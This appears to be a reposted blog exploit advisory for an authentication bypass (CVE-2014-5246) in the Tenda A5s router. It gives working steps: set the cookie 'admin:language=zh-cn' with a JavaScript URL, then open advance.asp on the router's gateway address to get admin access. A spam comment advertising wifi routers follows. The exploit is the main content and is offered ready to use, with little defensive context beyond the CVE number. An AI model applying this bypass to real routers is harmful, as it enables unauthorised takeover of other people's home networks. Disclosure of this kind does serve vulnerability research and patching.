Tenda Router Authentication Bypass
11:12
Material's Title: Tenda A5s Router Authentication Bypass
Category: Web Applications
Platform: Hardware
Tenda A5s router suffers from an authentication bypass vulnerability due to improperly trusting cookies.
--------------------------------------------------------------------------------------------------------------------------
Tenda A5s Router Authentication Bypass Vulnerability
--------------------------------------------------------------------------------------------------------------------------
Product:
- Vendor: Tenda
- Version: V3.02.05_CN
- CVE : CVE-2014-5246
Exploit:
Type: Exploit & p0c
Go to you Gateway [E.g]:
http://192.168.2.1/
Then set cookie with javascript
--------------------------------------------------------------------------------------------------------------------------
javascript:document.cookie='admin:language=zh-cn'
--------------------------------------------------------------------------------------------------------------------------
Then Go to this Path[E.g]:
http://192.168.2.1/advance.asp
You are the admin...!
1 comments
It is rather very good, nevertheless glance at the data with this handle. best wifi router
ReplyDelete